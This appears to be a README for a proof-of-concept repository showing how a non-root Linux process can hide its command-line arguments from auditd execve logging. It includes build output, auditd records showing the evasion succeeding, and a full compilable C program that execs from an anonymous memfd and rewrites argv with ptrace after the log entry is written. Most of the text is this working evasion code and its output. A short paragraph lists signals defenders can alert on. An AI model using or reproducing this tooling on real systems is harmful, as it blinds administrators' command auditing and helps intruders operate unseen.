QAX-A-Team/ptrace
a PoC for Linux to get around agents that log commands being executed, without root privilege.
Linux: obfuscate the program name and arguments of a process run with low (non-root) privileges, evading command logs that rely on monitoring the execve system call. This program is for demonstrating the principle only.

Build and run. The PoC executes `ls -a -l` with obfuscated argv; the `total 76` listing below is the output of that hidden command:

```text
ylbhz@hk:~/work/c/ptrace$ gcc --version
gcc (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609
ylbhz@hk:~/work/c/ptrace$ make
gcc -Wall -c ptrace.c -o ptrace.o
gcc -Wall -c anonyexec.c -o anonyexec.o
gcc -o ptrace ptrace.o anonyexec.o elfreader.o
ylbhz@hk:~/work/c/ptrace$ ./ptrace
child pid = 3763
EIP: _start 4049a0
RSP: 7ffc4f394e60
RSP + 8 => RDX(char **ubp_av) to __libc_start_main
argc: 3
src: ubp_av[1]: 3abb6677��@
dst: upb_av[1]: -a
src: ubp_av[2]: 3abb6677��@
dst: upb_av[2]: -l
ylbhz@hk:~/work/c/ptrace$ total 76
drwxrwxr-x  2 ylbhz ylbhz  4096 Jan  7 10:34 .
drwx------ 16 ylbhz ylbhz  4096 Dec 29 15:08 ..
-rw-rw-r--  1 ylbhz ylbhz   349 Jan  3 18:39 Makefile
-rw-rw-r--  1 ylbhz ylbhz     1 Jan  7 10:31 README
-rw-rw-r--  1 ylbhz ylbhz   681 Jan  3 18:24 anonyexec.c
-rw-rw-r--  1 ylbhz ylbhz   226 Jan  3 17:59 anonyexec.h
-rw-rw-r--  1 ylbhz ylbhz  2680 Jan  7 10:34 anonyexec.o
-rw-rw-r--  1 ylbhz ylbhz   527 Jan  3 18:05 common.h
-rw-rw-r--  1 ylbhz ylbhz   230 Jan  3 19:00 elfreader.c
-rw-rw-r--  1 ylbhz ylbhz   142 Jan  3 18:59 elfreader.h
-rw-rw-r--  1 ylbhz ylbhz  1656 Jan  3 19:00 elfreader.o
-rwxrwxr-x  1 ylbhz ylbhz 13992 Jan  7 10:34 ptrace
-rw-rw-r--  1 ylbhz ylbhz  2123 Jan  4 11:24 ptrace.c
-rw-rw-r--  1 ylbhz ylbhz   328 Jan  4 10:38 ptrace.h
-rw-rw-r--  1 ylbhz ylbhz  4768 Jan  7 10:34 ptrace.o
```

================= AUDITD execve test =========================

```text
type=PATH msg=audit(1546831731.460:100): item=0 name="./ptrace" inode=11017404 dev=08:06 mode=0100775 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1546831731.460:100): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1835390 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1546831731.460:100): proctitle="./ptrace"
type=SYSCALL msg=audit(1546831731.464:101): arch=c000003e syscall=59 success=yes exit=0 a0=7ffd846ee3d0 a1=7ffd846ee660 a2=0 a3=598 items=2 ppid=7971 pid=7972 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts4 ses=4294967295 comm="3" exe=2F6D656D66643A656C66202864656C6574656429 key="rule01_exec"
type=EXECVE msg=audit(1546831731.464:101): argc=3 a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"
```

Event 100 is the shell executing `./ptrace`. Event 101 is the hidden exec: auditd hex-encodes any field containing a space, and `exe=2F6D656D66643A656C66202864656C6574656429` decodes to `/memfd:elf (deleted)`, i.e. the ELF was copied into an anonymous memfd and executed through `/proc/self/fd/3`, which is also why `comm` is just `3`. The EXECVE record keeps the placeholder strings that were on the stack when execve ran; the `-a` and `-l` that ptrace writes over them afterwards never reach the log. Note that the memfd `exe`, the `/proc/self/fd/N` argv[0] and the long opaque argument blobs all remain in the record and are themselves good things to alert on.
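The core of the technique in one file, as an added example that is not the repository's code. It keeps the two ideas shown in the log above (exec from a memfd through `/proc/self/fd/N`, placeholder argv patched by the tracing parent), but instead of the PoC's elfreader breakpoint at `_start` it rewrites argv at the SIGTRAP stop the kernel delivers right after a successful execve of a PTRACE_TRACEME child, when RSP already points at argc of the new image. Assumptions: Linux on x86-64 (the page's target; an aarch64 branch is included), glibc 2.27 or newer for `memfd_create`, ptrace permitted for a parent tracing its own child, and `/bin/ls` present. `PLACEHOLDER_LEN`, `merge_word`, `fits_in_place`, `poke_bytes`, `tracee_sp`, `load_into_memfd` and `exec_with_hidden_argv` are names chosen here.

```c
#define _GNU_SOURCE
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Placeholder length, standing in for the PoC's long hex blobs; each real
 * argument is later written into the storage execve allocated for one. */
#define PLACEHOLDER_LEN 64

/* Overlay n bytes of src onto a word read with PTRACE_PEEKDATA, so a partial
 * final word does not clobber whatever follows the string on the stack. */
static long merge_word(long old, const char *src, size_t n)
{
    if (n > sizeof(long)) n = sizeof(long);
    memcpy(&old, src, n);
    return old;
}

/* The real argument (without its NUL) must fit inside the placeholder. */
static int fits_in_place(const char *real)
{
    return strlen(real) <= PLACEHOLDER_LEN;
}

/* Write len bytes into the tracee at addr, one native word at a time. */
static int poke_bytes(pid_t pid, unsigned long addr, const char *src, size_t len)
{
    for (size_t off = 0; off < len; off += sizeof(long)) {
        size_t n = len - off < sizeof(long) ? len - off : sizeof(long);
        errno = 0;
        long w = ptrace(PTRACE_PEEKDATA, pid, (void *)(addr + off), NULL);
        if (w == -1 && errno) return -1;
        w = merge_word(w, src + off, n);
        if (ptrace(PTRACE_POKEDATA, pid, (void *)(addr + off), (void *)w) == -1) return -1;
    }
    return 0;
}

/* Stack pointer of the stopped tracee; at the post-execve stop it points at argc. */
static unsigned long tracee_sp(pid_t pid)
{
    struct user_regs_struct regs;
    struct iovec iov = { &regs, sizeof regs };
    if (ptrace(PTRACE_GETREGSET, pid, (void *)NT_PRSTATUS, &iov) == -1) return 0;
#if defined(__x86_64__)
    return regs.rsp;
#elif defined(__aarch64__)
    return regs.sp;
#else
#error "unsupported architecture"
#endif
}

/* Copy the ELF at path into an anonymous memfd, so audit's exe= field reads
 * "/memfd:elf (deleted)" instead of the real path. Returns the fd or -1. */
static int load_into_memfd(const char *path)
{
    static char buf[1 << 16];
    int in = open(path, O_RDONLY), mfd = memfd_create("elf", MFD_CLOEXEC);
    ssize_t n;
    if (in < 0 || mfd < 0) return -1;
    while ((n = read(in, buf, sizeof buf)) > 0)
        if (write(mfd, buf, (size_t)n) != n) return -1;
    close(in);
    return mfd;
}

/* Exec path with placeholder argv, then, at the post-execve ptrace stop (after
 * auditd's EXECVE record exists, before main() runs), overwrite the argv
 * strings on the child's stack with the real ones. Returns the child's exit code. */
static int exec_with_hidden_argv(const char *path, char *const real_argv[])
{
    int argc = 0, status;
    while (real_argv[argc]) argc++;
    for (int i = 1; i < argc; i++)
        if (!fits_in_place(real_argv[i])) return -1;
    int mfd = load_into_memfd(path);
    if (mfd < 0) return -1;
    char fdpath[64], placeholder[PLACEHOLDER_LEN + 1], *fake[argc + 1];
    snprintf(fdpath, sizeof fdpath, "/proc/self/fd/%d", mfd);
    memset(placeholder, 'a', PLACEHOLDER_LEN);
    placeholder[PLACEHOLDER_LEN] = '\0';
    fake[0] = fdpath;                         /* comm becomes the fd number, as in the PoC */
    for (int i = 1; i < argc; i++) fake[i] = placeholder; /* execve copies each entry separately */
    fake[argc] = NULL;
    pid_t pid = fork();
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(fdpath, fake, environ);        /* a successful exec stops the tracee with SIGTRAP */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status) || WSTOPSIG(status) != SIGTRAP) return -1;
    unsigned long sp = tracee_sp(pid);        /* [argc][argv[0]]...[argv[argc-1]][NULL][envp]... */
    if (ptrace(PTRACE_PEEKDATA, pid, (void *)sp, NULL) != argc) return -1;
    for (int i = 1; i < argc; i++) {
        unsigned long strp = (unsigned long)ptrace(PTRACE_PEEKDATA, pid, (void *)(sp + sizeof(long) * (1 + i)), NULL);
        if (poke_bytes(pid, strp, real_argv[i], strlen(real_argv[i]) + 1) == -1) return -1;
    }
    ptrace(PTRACE_DETACH, pid, NULL, NULL);   /* resume; signal 0 drops the SIGTRAP */
    waitpid(pid, &status, 0);
    close(mfd);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *real[] = { "ls", "-a", "-l", NULL };   /* what actually runs */
    return exec_with_hidden_argv("/bin/ls", real);
}
```

Build with `gcc -Wall -o anonyexec_poc anonyexec_poc.c` and run it while an execve audit rule is loaded (for example `auditctl -a always,exit -F arch=b64 -S execve -k rule01_exec`, which is the shape of rule that yields records keyed `rule01_exec` as above): the terminal shows a long listing, while the EXECVE record shows only `/proc/self/fd/N` and two 64-byte `a…a` placeholders. The read-modify-write in `poke_bytes` matters because PTRACE_POKEDATA writes whole words; writing a padded word for a short argument such as `-a` would otherwise overwrite the bytes after its NUL, which belong to the next argv string.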